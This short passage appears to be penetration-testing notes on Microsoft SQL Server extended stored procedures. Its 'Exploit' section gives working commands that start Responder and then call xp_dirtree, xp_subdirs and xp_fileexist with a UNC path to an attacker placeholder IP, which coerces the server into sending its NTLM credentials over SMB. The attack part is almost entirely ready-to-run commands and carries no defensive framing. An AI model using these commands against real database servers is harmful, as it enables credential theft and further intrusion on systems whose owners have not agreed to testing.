• xp_fileexist: Checks whether a certain file exists
• xp_dirtree: Returns a directory tree based on a provided directory
• xp_subdirs: Returns a list of sub-directories of a provided directory

Exploit

1. Start Responder (any SMB server/handler works too)

sudo responder -I tun0 -v

2. Coerce

EXEC xp_dirtree '\\<IP>\a';
EXEC xp_subdirs '\\<IP>\a';
EXEC xp_fileexist '\\<IP>\a';